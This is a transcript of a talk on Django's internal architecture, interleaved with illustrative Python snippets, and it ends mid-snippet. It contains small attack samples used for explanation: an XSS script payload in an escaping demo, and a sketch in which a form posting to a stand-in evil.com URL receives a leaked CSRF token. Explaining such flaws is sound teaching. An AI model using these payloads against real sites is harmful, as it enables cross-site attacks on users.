
Django's architecture: The good, the bad, and the ugly


Formal Metadata

Title
Django's architecture: The good, the bad, and the ugly
Number of Parts
64
License
CC Attribution 2.0 Belgium:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.

Content Metadata

Abstract
Django has become one of the leading web frameworks over the past few years, and has become well-known in the web industry for both good and bad reasons. This talk takes a look at the internal architecture of Django, and highlights what we've cleaned up, what we got right from the start, and the dusty corners of the code that still need a bit more work: a never-ending problem in such a large open-source project.
Transcript: English (auto-generated)
All right, thank you for coming. I'm Andrew Godwin, and I'm going to give you a talk on Django's architecture: the good, the bad, and the ugly. I'll cover exactly what that means in a few short moments. But first of all, just an introduction to myself.
I'm one of the Django core committers. I have been working with Django for about three years, and I became a core committer last year. I am, at various times, either a freelance or mercenary programmer, as I like to call myself. And at the moment I'm also sort of founding a startup, apparently. It's more a project that evolved.
So first of all, I want to start off with a brief history of Django: how it's evolved and where it's come from, in case you're unfamiliar, which a lot of people are. Django started off at the Lawrence Journal-World in Lawrence, Kansas, in 2005. A team of three developers and one designer built Django internally for use with a few sites the World Company was building. They were very much newspaper sites; they were quite CMS-y. But it was still quite a generic framework, and so they decided to publicly release it the same year. They weren't expecting much reaction, but the reaction they got overwhelmed them.
The oft-repeated story is that in 2006 Jacob, one of the first few developers of Django, famously said that Django 1.0 was just around the corner. A mere two years later, they finally got to 1.0, after rewriting about half the code base. Since 1.0, we've had basically an API feature freeze, or at least backwards compatibility. Any feature you want to get rid of has to go through at least three versions of deprecation, so it's quite stable now.
Before 1.0, it was anything goes. A lot of people were running off the main branch in Subversion for quite a while. I think there was about a year and a half between stable releases at one point, and there were many, many production sites just running off the development branch. So it's nice that we finally have some stable releases again. Release 1.3 is coming up in a few weeks. It's more of a minor bug-fix release this time. Since 1.0, we've added a few big features.
1.3 has a little less, but we've still snuck some fairly major features in. Generally, it's progressing nice and stably these days. So one of the main things about architecture is how things are laid out. First of all, I'm going to go through how Django is laid out in the code base. For those of you who aren't familiar with Python, it should be pretty obvious how things work: there are modules, like in most other languages, and they're hierarchical. After that, I'm going to go through some of the more interesting points of the Django code base and architecture. Some of them are good, some of them used to be bad and we fixed them, and some of them are still a bit ugly, and we're going to try to fix them soon.
So Django is, as you can imagine for a large web framework, a very complex beast. This is a subset of the top-level modules in Django. These are the main, important ones, though.
Going through them alphabetically: contrib is where we keep all of our optional add-ons. Django's philosophy is that anything that doesn't have to be in the core is in contrib, and you can disable it. So user authentication, sessions, all that kind of stuff are in there. I'll go over that in more detail in a second. Core is where all the absolutely essential parts of Django are, things like URL resolving, basic functions and handlers. DB is our models backend for talking to databases. It's an abstraction layer; I'll go over that again in a minute.
Dispatch is the signal handlers. Django has signals, which you can register hooks into. So you can say, when this model is changed, run this function. You can do custom save hooks, custom validation, things in that kind of area. HTTP is our HTTP handling library. It does things like recognizing status codes, forming correct responses, MIME handling, that kind of stuff. Forms is the forms library.
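The signal idea mentioned above (register a hook, then have it run when a model changes) can be sketched without any framework. This is only an illustration of the pattern, not Django's dispatch code; the `Signal` class, the `post_save` name as used here, the `Article` model and the `log_save` receiver are all assumptions made up for the example.

```python
class Signal:
    """A tiny stand-in for a signal: a list of receiver functions."""

    def __init__(self):
        self._receivers = []

    def connect(self, receiver):
        # Register a hook to be called whenever the signal is sent.
        self._receivers.append(receiver)

    def send(self, sender, **kwargs):
        # Call every registered receiver and collect the return values.
        return [receiver(sender=sender, **kwargs) for receiver in self._receivers]


# Hypothetical signal fired after a model instance has been saved.
post_save = Signal()


class Article:
    def __init__(self, title):
        self.title = title

    def save(self):
        # A real model would write to the database here.
        post_save.send(sender=Article, instance=self)


audit_log = []


def log_save(sender, instance, **kwargs):
    # The custom save hook: record what was saved.
    audit_log.append(f"saved {sender.__name__}: {instance.title}")


post_save.connect(log_save)
Article("Hello").save()
```

The model never needs to know who is listening, which is what makes this kind of hook useful for add-on code.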
Django has had two forms libraries, one now called oldforms and one called newforms. This, in 1.3, is newforms. Forms is a generic way of writing user input forms: both simple forms like name, email, password, and more complex sets, where for example there must be at least three sets of name, email, password, they all have to be present, and there have to be at most five. It can get quite complex.
Middleware is where what Django calls middleware lives. If you aren't familiar with the concept from WSGI, it's basically code that runs around a request. You can intercept the incoming HTTP request and set custom variables, or change the headers. So you can do authentication; you can do CSRF protection. And then on the response you can do things too: you can gzip the response, for example.
Shortcuts is full of some handy bits, because Django can get very complex in its import paths. So there are things in there to just render this template into a response, and things like that.
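As a rough sketch of the "code that runs around a request" idea, the wrapper functions below touch the request on the way in and the response on the way out. This is not Django's middleware API; requests and responses are plain dictionaries here, and `hello_view`, `user_middleware` and `gzip_middleware` are names invented for the illustration.

```python
import gzip


def hello_view(request):
    # A view: takes a request (a plain dict here) and returns a response dict.
    return {"status": 200, "headers": {}, "body": b"hello " * 100}


def user_middleware(get_response):
    # Runs before the view: attach a custom variable to the incoming request.
    def middleware(request):
        request["user"] = request.get("cookies", {}).get("user", "anonymous")
        return get_response(request)
    return middleware


def gzip_middleware(get_response):
    # Runs after the view: compress the outgoing response body if allowed.
    def middleware(request):
        response = get_response(request)
        if "gzip" in request.get("accept_encoding", ""):
            response["body"] = gzip.compress(response["body"])
            response["headers"]["Content-Encoding"] = "gzip"
        return response
    return middleware


# Wrap the view; the outermost middleware sees the request first
# and the response last.
handler = gzip_middleware(user_middleware(hello_view))
request = {"cookies": {"user": "andrew"}, "accept_encoding": "gzip"}
response = handler(request)
```

Because each layer only knows about the callable it wraps, layers can be added or removed without touching the view.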
Templates is where the Django templating language lives. The Django templating language is quite an odd beast. It's designed mostly so that you can't do much logic in it. For a very long time it was designed very much this way; we're slowly weaning ourselves off that at the moment. I'll come on to that later. It's quite interesting, and it's probably one of the oldest parts of the code base that hasn't been touched very much.
And then finally, views, which is where all our generic views live. In the latest release of Django, we've introduced something called class-based views, which are a better framework for writing views, and all that code lives in there.
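To give a feel for why class-based views help, here is a framework-free sketch: a function view and a class-based view are both just callables that take a request and return a response, and a subclass can override one small piece while inheriting the rest. The `Response`, `ListView` and `FruitListView` classes are hypothetical stand-ins, not Django's own classes.

```python
class Response:
    def __init__(self, body, status=200):
        self.body = body
        self.status = status


def hello(request):
    # A function view: request in, response out.
    return Response("Hello, " + request.get("name", "world"))


class ListView:
    # A class-based view: instances are callable, so they too
    # take a request and return a response.
    items = []

    def get_items(self, request):
        return self.items

    def render(self, items):
        return ", ".join(items)

    def __call__(self, request):
        return Response(self.render(self.get_items(request)))


class FruitListView(ListView):
    items = ["apple", "avocado", "banana"]

    def get_items(self, request):
        # Override one small piece; rendering and dispatch are inherited.
        prefix = request.get("startswith", "")
        return [name for name in self.items if name.startswith(prefix)]
```

Calling `FruitListView()({"startswith": "a"})` goes through the inherited `__call__` and `render`, with only the item selection customized.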
So contrib is, as you can see, even more in-depth than the top-level tree. These are the main contrib apps; there are about six more of them. I'll go through some of the more interesting ones later, with some pictures of how they work. Admin is Django's famous, magical administration interface, where you can edit your data. Auth is our user authentication system, the subject of much debate. It works very well out of the box for small applications. Comments is a bit of an odd commenting system that was great when it was invented and is getting a bit out of date now.
Content types is a way of doing generic foreign keys to other things, so you can link to arbitrary tables and models. It kind of breaks relational database conventions a bit, but it can be very useful for things like comments, which it lives next to. Flat pages is a very simple way of just having pages stored in the database. So for things like an about page and an FAQ page, you can just have them. It's, again, not very complex. The idea of contrib is that it's very simple implementations of very common patterns. That's the definition of it.
GIS is one of the more interesting ones. It's Django's geospatial support. So you can do arbitrary polygons, you can do testing of lines in lines, you can do projections, you can do all sorts of exciting things.
I've got some stuff on that later as well. Humanize is full of things for making numbers and sizes human-readable. So you can do things like putting commas in numbers, or changing numbers to words.
Localflavor is full of things that are for localization, as opposed to internationalization. For those who don't know the difference, internationalization is translating words. So, for example, rather than saying hello, Andrew, you can have bonjour, Andrew. Localflavor is different in that it's localizing what you put in. In the UK, we'd have a postcode; in the US, you have a ZIP code. Things like telephone numbers also vary from country to country, and there are other things as well. Things like the US state fields are in there, because they're only relevant to the US. Most large countries have an entry in localflavor with some custom widgets for their country. So if you're building an application for something that isn't based in either the UK or America, which a lot of people here in Europe do, you can actually do it sanely, which is helpful.
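The postcode versus ZIP code distinction can be made concrete with a small validator that picks its rule by country. This is a sketch only: the two patterns are deliberately simplified assumptions and do not cover every valid code, and `POSTAL_PATTERNS` and `clean_postal_code` are names invented here rather than anything from localflavor.

```python
import re

# Deliberately simplified patterns, for illustration only.
POSTAL_PATTERNS = {
    "US": re.compile(r"^\d{5}(-\d{4})?$"),                    # ZIP or ZIP+4
    "GB": re.compile(r"^[A-Z]{1,2}\d[A-Z\d]? ?\d[A-Z]{2}$"),  # UK postcode
}


def clean_postal_code(country, value):
    # Normalise the input, then check it against the country's pattern.
    value = value.strip().upper()
    pattern = POSTAL_PATTERNS[country]
    if not pattern.match(value):
        raise ValueError(f"{value!r} is not a valid postal code for {country}")
    return value
```

The same input can be valid in one country and invalid in another, which is why this kind of code is kept per country rather than in the generic form fields.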
Messages is a way of passing messages along to upcoming pages. I think in Rails they call this flash. The idea is that when somebody saves something, you can store a message telling them it's been saved, and then the next page along can look at the messages and go, oh, look, it's been saved. Sessions is our support for sessions, because obviously HTTP is stateless.
So that just uses cookies, and it stores things in either a database or a cache backend. Static files is new in 1.3. Django used to just tell you to do your own management of CSS and images and things. In this release, we've decided to move in support for managing those more sanely. The idea with Django is that you can have these third-party reusable apps, and it used to be the case that you had to take the media they shipped with, their CSS, their JavaScript, and move it into the right place yourself. With static files, Django will automatically take all of that media and put it in the right place for you. And there's also syndication, which is our support for RSS, Atom, and those other kinds of feeds.
Core itself has a few other things inside it. Namely, there's the cache, which is our cache backend. The cache backend is somewhat abstracted; I'll talk about that in a bit. There's files, which is support for uploading files and handling on-disk files. There are various optimizations there, so small files just get stored in memory, and large files get pushed onto the disk as they're uploaded, so you don't use up all the memory on a one-gig file being uploaded. Handlers is full of support for things like talking to mod_wsgi, talking to mod_python, all the various ways you can run Django. I believe there's FastCGI support in there as well.
Mail is the abstraction layer for emailing people. It used to be fixed. These days, you can have an email backend for SMTP, and you can have one that prints to the console, so you can debug and see what would be sent. And there are a few other things in there as well.
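The swappable mail layer described above can be sketched as two interchangeable backends behind one `send_mail` function. The class and function names below are hypothetical and only illustrate the pattern; they are not Django's mail API.

```python
import io
import sys


class ConsoleEmailBackend:
    """Writes messages to a stream instead of sending them."""

    def __init__(self, stream=None):
        self.stream = stream if stream is not None else sys.stdout

    def send(self, subject, body, to):
        self.stream.write(f"To: {', '.join(to)}\nSubject: {subject}\n\n{body}\n")
        return 1


class MemoryEmailBackend:
    """Keeps messages in a list, which is handy in tests."""

    def __init__(self):
        self.outbox = []

    def send(self, subject, body, to):
        self.outbox.append((subject, body, tuple(to)))
        return 1


def send_mail(subject, body, to, backend):
    # Calling code does not care which backend it was given.
    return backend.send(subject, body, to)


buffer = io.StringIO()
sent = send_mail(
    "Welcome", "Thanks for signing up.", ["user@example.com"],
    ConsoleEmailBackend(buffer),
)
```

On a development machine the console backend shows exactly what would have gone out, without needing a mail server at all.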
Management is support for Django's idea of management commands. Management commands are basically where you can say, this is a task that people can run. So you can say import data, or that kind of stuff, and you can define these per application in Django. So, for example, I write an application called South, which does database migrations for Django. I can ship lots of management commands, which do things like run migrations or let you half-create migrations automatically. Those are all my management commands, and the framework for those lives in there.
Serializers is our support for reading and writing JSON and XML, and one other format, I forget what it is, for models. So rather than dumping SQL, you can dump a database-independent format. It's not particularly efficient, and it will fail on large databases, but for moving stuff around in development, when often you're using perhaps SQLite on one machine and Postgres on another, it can be very handy. Servers is where the implementations of the two actual web servers Django has in it are.
So there's a very small debugging web server, so you don't have to have Apache or mod_python or Gunicorn installed locally, and there's also a FastCGI wrapper in there, which counts as a server. Paginator, for some reason, lives in here. I'm not quite sure why it does, but it supports basically taking a list of things and splitting it into pages, which is obviously used a lot in most websites.
URL resolvers is our URL framework. In Django, URLs are a set of regular expressions. It reads through them top to bottom, takes the first one that matches, and fires the view connected to that. And then validators is new in 1.2, where we have model validation.
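The URL resolution rule just described (a list of regular expressions, read top to bottom, first match wins) is simple enough to sketch in a few lines. This is a minimal illustration under assumed names, not Django's resolver: `urlpatterns` here is a plain list of (pattern, view) pairs, and the two views are made up.

```python
import re


def article_list(request):
    return "all articles"


def article_detail(request, year, slug):
    return f"article {slug} from {year}"


# Hypothetical URL table: (regular expression, view) pairs, checked in order.
urlpatterns = [
    (re.compile(r"^articles/$"), article_list),
    (re.compile(r"^articles/(?P<year>\d{4})/(?P<slug>[\w-]+)/$"), article_detail),
]


def resolve(path):
    # Walk the patterns top to bottom; the first match wins.
    for pattern, view in urlpatterns:
        match = pattern.match(path)
        if match:
            # Named groups become keyword arguments for the view.
            return view, match.groupdict()
    raise LookupError(f"no URL pattern matches {path!r}")


view, kwargs = resolve("articles/2011/hello-world/")
result = view(request=None, **kwargs)
```

Because the first match wins, the order of the list matters: a broad pattern placed early will shadow more specific ones below it.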
What we used to do is just have forms validate input, and then when you tried to save something, the database would just die if it was the wrong type. So if you incorrectly had a character field on your form and saved it to an integer field, the database would just die horrifically and go, no, that's wrong. In 1.2, we introduced the idea of model validation. So now models also validate things when you put them in, and you get sensible errors rather than the occasionally cryptic MySQL or Postgres errors, which can often be quite confusing.
The database backend is split into essentially two parts, backends and models. Backends is where all our database-specific code lives. There are backends for MySQL, Postgres, Oracle, and SQLite in core, and there are also Microsoft SQL Server, Firebird, and a few other ones available as third-party applications. They don't have to live in here; these are just the ones we ship with. And then models is the layer that goes on top of that. Backends hides all the database-specific stuff, like what types to use. And models is where, so in Python we have metaclasses and things, so you can do things declaratively, and that's where all that magic lives. It's not as magic as it sounds.
There are many other parts. I could spend all day going through every module we have in our code base, but for your sanity, I won't. So here are a few interesting ones.
We have decorators for views. If you're unfamiliar with Python, decorators are the concept of a function which wraps a function. Basically, because in Python functions are first-class objects, you can take a function, pass it through a different function, and get a different function in return. They can get complex. But the idea is you can wrap a function in "this must be done by an admin", "this must be done by a logged-in user", or various other checks like that, and some common ones live in there.
Generic views contains some simple views. A lot of sites do things like render a simple template, render a model to a template, render lists of models, and there's common code for all those kinds of things that lives in generic views. So you can take them for your generic site, just pull them in, and have all that code written for you.
CSRF is our cross-site request forgery protection. Cross-site request forgery is one of those attack vectors on websites that isn't very well understood. It's very important, and it can mean your users get very nasty things done to them.
Django ships with full support for CSRF protection. We have done for a long time, and I'll cover that again in a bit. It's been upgraded recently to be less evil than it used to be. Test is the testing framework, which is very important. There are custom test handlers, and there's a custom test client where you can make fake requests to Django, and you can do things like assert that a template's been used, and look in the context of templates, and things like that.
There's also forms, which is arranged around this idea of widgets. A widget could be a text area or a select box. Fields, which then use one of those, have types. So for example, if I had an integer field, it could use a text area, or a text input. You can have multi-select fields and things like that. Formsets is this idea of having many things, so you can have up to four users, or you can edit a list of things. And models is our support for introspecting models and making forms automatically out of them. So if you have a model, we can read the field types and look at what it is.
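The split between widgets (how something is drawn) and fields (what type it is and how it validates) can be sketched as follows. The classes below are simplified, hypothetical stand-ins written for this illustration, not the forms library itself.

```python
import html


class TextInput:
    # Widget: only knows how to draw itself as HTML.
    def render(self, name, value):
        return '<input type="text" name="{}" value="{}">'.format(
            html.escape(name), html.escape(str(value))
        )


class ValidationError(Exception):
    pass


class IntegerField:
    # Field: has a type, validates raw input, and picks a widget.
    widget = TextInput()

    def clean(self, raw):
        try:
            return int(raw)
        except (TypeError, ValueError):
            raise ValidationError("Enter a whole number.") from None


class AgeForm:
    fields = {"age": IntegerField()}

    def __init__(self, data):
        self.data = data
        self.cleaned_data = {}
        self.errors = {}

    def is_valid(self):
        # Clean every field, collecting either a typed value or an error.
        for name, field in self.fields.items():
            try:
                self.cleaned_data[name] = field.clean(self.data.get(name))
            except ValidationError as exc:
                self.errors[name] = str(exc)
        return not self.errors
```

Keeping the two apart means the same integer field could be drawn with a different widget without changing how it validates.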
But basically, since 2005, literally every piece of code in Django has been changed. There's very little left from the original release that hasn't been touched by somebody. In some places, this is because the original code was a bit odd. In other places, it's because requirements have changed over time. And in other places, it's because we've just expanded on what things can do.
But the main crux of this talk is to go through what I think some of the good bits of Django are, some of the bad bits, and some of the really horrible bits that just should never have been in there in the first place. As I said before, some of these are historical and we've fixed them, but I get to talk about them here because we've fixed them and I can gloat. Others are current issues in Django that we have yet to fix, because we don't have infinite time and infinite developers. Yeah, there we are. The nasty bits, I promise, will be fixed soon. Just don't attack me.
So, the good things. The main crowd-pleaser in Django is the admin. A lot of people, when they first come to Django, love the idea that they can write about 20 lines of code for a model, add two or three lines for an admin, hit go, and then this big page appears that lets you edit things straight away. That's very handy. The admin is often not used as-is on end-user sites, although it is a lot of the time, but even in development it can be a lifesaver, because you can edit your test data and do all that kind of stuff really easily without having to fiddle around in a SQL console or a Python shell. I can't tell you how many hours or days the admin has saved me over the past three or four years working with Django, just being able to visually edit and fiddle with my models. And also, a lot of clients are quite happy with the admin. It's quite sensible, it's quite clean, it doesn't do very much, but there are lots of extensions for it.
The model layer.
This is an often derided part of Django. People often say, well, there are lots of other abstraction layers for databases in Python: there was SQLObject, not so much anymore, there's SQLAlchemy, there are lots of others. But Django has a different philosophy. First of all, we call it the model layer. It's not an ORM; it's not specifically designed to deal with relational databases, and there is partial support for things like MongoDB in there as well. It is very much an abstraction away from that concept. Obviously relational things do leak through, they have to, foreign keys are in there, but we like the simplicity and the way it's designed.
And also, back in 2005, there weren't that many other things around. People often forget that.
Django is full of sensible abstractions. One of the things a lot of other places often don't have, perhaps younger frameworks or frameworks in different languages, is the option to opt out of having database-backed sessions and other things like that. So there are different session backends: on larger sites, for example, you want your sessions to be in something big like memcached, or you want them in signed cookies, which is even more scalable. For caching, there's memcached, there's Redis, there's on-file, there's in-database, there are all sorts of options for that. Email backends we've just changed, so you don't have to send by SMTP anymore. Especially if you're developing on a local box, you may not have SMTP support, and your laptop may not know what sendmail even is, so the idea of printing to the console rather than sending email and things like that
is really handy. GeoDjango is one of my favorite parts of Django. It was co-opted into Django only just before the 1.0 release; it used to be a separate project. For those who aren't familiar with geospatial work, GeoDjango lets you define areas or points or lines. So, for example, areas can be counties or administrative regions or countries, lines could be roads, and points could be places.
And the idea is that you can define models like you usually do. So I can say, here are some lakes: they have a name, they have a rate, which is their rate of fill, they have a geom, which is their actual polygon, and then the objects line is there so it knows how to do geospatial queries. Then we can say, get the lake with ID 3, and we can ask whether this lake contains itself, which it does. And not only can you do this, you can define areas, so I could get the polygon of the USA and say, tell me all the lakes that are inside this polygon. And then PostGIS, which is the PostgreSQL GIS backend (MySQL has basic support for rectangular ones, and there are a few other backends), can take that query, handle it quite efficiently, and return me, quite quickly, all the lakes that are inside the USA. Again, you can do it with points, so I can ask for all events that have happened inside London, and it will just give me all the things that are inside that area.
It also gives you a very nice admin interface for editing these. So if you're unsure where South Africa is, you can pop it up in the model admin and say, oh, that's South Africa, and you can also edit them and pull the points around and various things,
so you can change what things look like, and it's very useful for testing.
Django has some very good debugging tools. We have manage.py shell; for those unfamiliar with that, it launches a Python interactive shell, or REPL, inside your Django project, so you can import your models, play around with them, test out your functions, test out your filters, and do all that kind of stuff. We have good testing tools as well. Django has a very strong testing community. People are often derided for not writing tests, and there was, in fact, a Django Dash project two years ago, I think it was called Django Pants for some reason, that took applications on PyPI, downloaded them, looked at how many tests they had, checked their coverage, and gave you a rating from A to C, which was quite nice. But Django has quite a lot of testing tools. It has a fake client, so you can make fake requests against your application and see what comes back. So rather than just testing that it returns 200 OK, you can test that, if I ask for the page about ponies, it uses the ponies template, it returns a context with the right things in it, all those kinds of things.
And also, as I said, the culture of debugging and testing around Django is very good. Not only does core Django have this idea of testing, where every single bug we have must have a test that proves it's been fixed, but there are also third-party tools for debugging and testing, things like Django Debug Toolbar, which shows you on your site what's been going on.
The new CSRF protection is nice. I have to qualify it as the new one, because the old one is in my ugly section, as I'll tell you later. So the new CSRF protection is very nice.
You can write a form, say put a token here, and then a middleware will automatically check that all your POSTs are protected. A quick introduction for those who don't know what CSRF is: if your application has a POST view, so if you say, if you post here, we'll delete something, then evil.com can have a form that posts to the right URL on your site. And if the user's logged in, it can just auto-post that in an iframe in the background and start deleting stuff over here. So with CSRF protection, the idea is that you have tokens: whenever your site makes a web page, it puts a token in its form, so it can prove that the form being submitted came from itself. I'll go into why later, but it's very important that that's the case. But the new one is quite nice, and you can optionally turn it off on different parts of the site. The old one had to be on or off globally. With the new one, you can say it's on for the admin and off everywhere else.
Auto-escaping: this was a major introduction in Django around 1.0. It's the idea that all strings in templates always have the HTML inside them escaped, unless you say otherwise. This immediately stops a lot of cross-site scripting attacks in their tracks. It's not perfect security design, and it won't fix all attacks, but it really does help a lot of people who are new to Django, or people who are coding in a hurry and have deadlines. It makes you feel safe about your code: you know that if you render this variable, even if it contains a script tag, nothing will happen; it should just show the script as text. So that's really handy. And we managed to introduce it in a nice, mostly backwards-compatible way.
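The auto-escaping rule (escape everything unless told otherwise) can be illustrated with the standard library. This is a minimal sketch, not the Django template engine: `render` uses plain `str.format`, and `SafeString` and `mark_safe` are stand-in names defined here for the example.

```python
import html


class SafeString(str):
    """Marks a string as already-safe HTML that must not be escaped again."""


def mark_safe(value):
    return SafeString(value)


def render(template, context):
    # Escape every value unless it was explicitly marked safe.
    escaped = {
        key: value if isinstance(value, SafeString) else html.escape(str(value))
        for key, value in context.items()
    }
    return template.format(**escaped)


comment = "<script>alert('pwned')</script>"
page = render("<p>{comment}</p>", {"comment": comment})
trusted = render("<p>{comment}</p>", {"comment": mark_safe("<b>hi</b>")})
```

In `page` the script tag arrives as harmless text, while `trusted` keeps its markup because the caller opted out explicitly. The safe behaviour is the default, and the risky one has to be asked for.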
The simplicity of the view API is something that some of the core committers are very happy about. In Django, a view is just any callable that takes a request and returns a response. It doesn't matter what it is: it can be a function, it can be a class with a __call__ method in Python, it can be something else. The idea is that anything that does this is fine. Views in Django are traditionally functions, so you use def, but recently we started having class-based views. So you can have a view, inherit from it, get most of the behavior, and use the sub-methods to change little bits of the behavior as well. So if I inherit from a list view, I can change the queryset it uses or the filters it uses for the models, but then get all the other code for free, rather than rewriting it in a new function. This kind of flexibility is very key in Django. We really do like the idea that we're not imposing one particular way on people, but we generally try to push you in the right direction.
Python, I think, was a good choice. Obviously, I'm biased here. There are many other good languages as well, but compared to something like C or Java, it's a lot easier and quicker to write things in a dynamic language. I'm sure other answers are fine, but I like Python, so I'm allowed to say that.
Multiple database support is very nice. This came in Django 1.2, and was in fact brought about at the first DjangoCon. Cal Henderson, one of the founders of Flickr, stood on stage and did a talk called Why I Hate Django, which was fantastic. We have a tradition in Django of having conference talks on why I hate Django. There's one every year. It's very important. Of Cal's points, his major one was that there was no support for more than one database. In Django 1.0, you connected to one database and that was it.
There was no support for having different ones to read from and different ones to write to. And at sites at big scale, you want to write to one database, the master, then read from the slaves, and various other things as well, like sharding by different kinds of table. And so multi-DB is a very important thing. It's very nicely done. It's not noticeable at all if you're using one database.
You'd never know it's there. And as soon as you want it, it turns up and you can do things with it. It's not very complex. It's got no built-in support for sharding or any kind of read-write balancing. But the idea is that if you're doing that stuff, you're probably quite large and you can afford to do it correctly yourself. Anything we shipped wouldn't fit most people.
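As a rough idea of what "doing it yourself" might look like: Django's multi-database support lets a project supply router objects with `db_for_read` and `db_for_write` methods. The sketch below is plain Python with no Django import; the class name and the database aliases are hypothetical and would have to match the project's own configuration.

```python
import random


class PrimaryReplicaRouter:
    """Sketch of a router: writes go to one database, reads are spread over replicas.

    The alias names are made up for this example; in a real project they
    would have to match keys in the DATABASES setting.
    """

    primary = "default"
    replicas = ["replica1", "replica2"]

    def db_for_read(self, model, **hints):
        # Any replica will do for a read.
        return random.choice(self.replicas)

    def db_for_write(self, model, **hints):
        # Every write goes to the primary.
        return self.primary


router = PrimaryReplicaRouter()
print(router.db_for_write(model=None))
print(router.db_for_read(model=None))
```

A real deployment would also have to think about replication lag, which is exactly the kind of site-specific decision the talk says Django leaves to the people running the site.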
You know, we'd rather you do it the right way for you than ship some code that worked all right half the time. We have a very small actual core. You can turn off nearly all of Django, the admin, the authentication, the sessions, all that kind of stuff, and be left with basically just URL resolving and a view handler. Not many people do. I've done it once in the past,
but it is quite nice that you can turn off bits. The admin especially is useful to turn off if you've got your own admin. Sessions are useful to turn off if you're doing a stateless website, to save some render time. Internationalization can be turned off if, like me, you do mostly English sites. I do do some internationalized ones. And, you know, it's nice to have that kind of flexibility.
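A stripped-down project of the kind described might have a settings module along these lines. This is only a sketch: the URLconf path is hypothetical, and the middleware setting is shown under the name used by Django releases of that era.

```python
# settings.py sketch for a project with most of Django switched off.
INSTALLED_APPS = ()        # no admin, auth or sessions apps installed
MIDDLEWARE_CLASSES = ()    # no session or auth middleware (later releases call this MIDDLEWARE)
USE_I18N = False           # skip the translation machinery
ROOT_URLCONF = "mysite.urls"  # hypothetical module; URL resolving is what remains
```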
And finally, documentation I think is very important. We have very good documentation. It's very extensive. It's not that well organized perhaps, but there's a lot of it there. And there's a culture of documentation. If you submit a bug patch to Django, it will not be accepted until it has documentation for what you've added,
if it's any new features, and a test, which means that any new features that get added always have documentation. And in third-party applications, if you don't have that documentation, you're derided. It's a big, strong thing. We like to make sure that people know how to use this stuff. It's all very well having all these cool programs, but unless people know what to do with them,
it's not very useful. Oh, that wasn't the finally. This is the finally. Or possibly not. The community I think is very important. Django has a very strong community. We've had three years of conferences now. They keep getting bigger. We have to keep moving to different hotels and making them bigger. And there's a very strong sense of community. We have lots of third-party applications, lots of people using it, lots of tips.
And generally, they're really friendly as well, and it's nice to have a community. It also means that the core development team can grow bigger, we can get more stuff done, and things can generally be quite good. Django is also not too high level. We don't take one method of doing stuff and impose it.
So not that I'm saying it's a bad idea, but certain CMSs, things like Drupal, for example, impose a certain way of doing things. And in Drupal, you basically, you start off with your thing and you sort of edit down and pare away things. In Django, you start at the bottom and you build up. For things you do in Django that aren't necessarily just content sites, this is fine.
If you want a content management system, there are ones built on top of Django. But Django is more a framework for general web applications. If you're doing a site that has mapping along with visualizations with some snazzy stuff, then you can sort of build them up and choose the right part from the start. And I think that's really nice. Now, the more interesting part, the bad. This is much more interesting.
So the old CSRF support was fascinatingly awful. As with most bad parts of Django, it used a regular expression. Basically, it looked for the last tag, well, it's not shown very well here, the closing form tag in any form.
It took that and replaced it with a CSRF token plus the closing form tag, which is all fine. So every form on the page gets a token saying what it is. That's all well and good. However, for forms that posted outside the site, say to evil.com, as in this example, it also included the token. This is not good, because that means evil.com has a token
that's valid for that user on your site. So they can then take that, post directly back to your site, and do a CSRF attack. And if you're using the admin, that means they can post to /admin/core/user/delete or something, and then start deleting your admin users, or even post their own admin user, or various other things.
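The leak is easy to reproduce with a few lines of Python. The sketch below follows the description in the talk (rewrite every closing form tag in the response) and is not the middleware's actual code; the function name, the field name and the token value are all made up.

```python
import re

CLOSE_FORM = re.compile(r"</form\s*>", re.IGNORECASE)


def inject_token_everywhere(html, token):
    """Put a hidden token field before every closing form tag, wherever the form posts."""
    # The field name is invented for this sketch.
    field = '<input type="hidden" name="csrf_token" value="%s">' % token
    return CLOSE_FORM.sub(lambda match: field + match.group(0), html)


page = (
    '<form method="post" action="/delete/"><button>Delete</button></form>'
    '<form method="post" action="http://evil.com/collect"><button>Go</button></form>'
)
rewritten = inject_token_everywhere(page, token="s3cret")

# Everything from the external action onwards belongs to the second form.
external_form = rewritten[rewritten.index("evil.com"):]
print("s3cret" in external_form)
```

Because the rewrite never looks at where a form submits to, the form pointing at the other site carries the user's token along with it.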
So thankfully, this was got rid of eventually. You can still turn it on. It's called legacy now. There's a very large warning in the documentation saying don't do this, it's probably very stupid, because you can get attacked by evil sites. But if you don't post outside your site, like the first people who did this didn't, it's fine. Schema changes have always been a problem in Django. In Django, when you make a new model,
you run syncdb, a new table appears, everybody's happy. If you add a new column, if you delete a column, if you change the constraints, Django itself just doesn't do anything. So luckily, I've been fixing this for the last two years by writing an external third-party application called South. There are other ones too, such as dmigrations.
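The gap described here can be reproduced with the standard library's sqlite3 module. This is an analogy, not Django's code: it assumes a "sync" step that only creates tables that are missing, and the table and column names are made up.

```python
import sqlite3


def columns(conn, table):
    """Return the column names of a table, in order."""
    return [row[1] for row in conn.execute("PRAGMA table_info(%s)" % table)]


conn = sqlite3.connect(":memory:")

# First sync: the table does not exist yet, so it is created.
conn.execute("CREATE TABLE IF NOT EXISTS blog_post (id INTEGER PRIMARY KEY, title TEXT)")

# The model later gains a 'published' field. Syncing again is a no-op,
# because the table already exists.
conn.execute(
    "CREATE TABLE IF NOT EXISTS blog_post "
    "(id INTEGER PRIMARY KEY, title TEXT, published INTEGER)"
)
after_sync = columns(conn, "blog_post")

# What a migration tool has to do instead: alter the existing table.
conn.execute("ALTER TABLE blog_post ADD COLUMN published INTEGER")
after_migration = columns(conn, "blog_post")

print(after_sync)
print(after_migration)
```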
I forget some other ones. Django Evolution did the same thing. But I think this was kind of an omission from Django at the start. Adding columns and deleting columns is something I do a lot. My schema doesn't start off set in stone. Django presumes you had, like, a UML diagram and then derived your models from that. Whereas I just sit there hacking about with models,
changing types of fields, adding constraints as I go. So I think the lack of that was a bit bad. The plan is hopefully to get some parts of schema changing into Django in a release or two's time. But there's no fixed timeline or feature set for that. So we'll have to wait and see. The template implementation is dodgy.
So those of you who've done parsing of languages know that you have a tokenizer or lexer and then a parser, basically. Django's tokenizer is two regular expressions and its parser is basically non-existent. It can't cope with any kind of nesting of comments or anything.
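To make the nesting problem concrete, here is a small regex-driven tokenizer in the same spirit. It is a sketch, not Django's source: it uses a single pattern rather than two, and `TAG_RE` and `tokenize` are names chosen for this example.

```python
import re

# One pattern recognising the three kinds of template tag. The matches are
# non-greedy, so the first closing delimiter always ends the tag.
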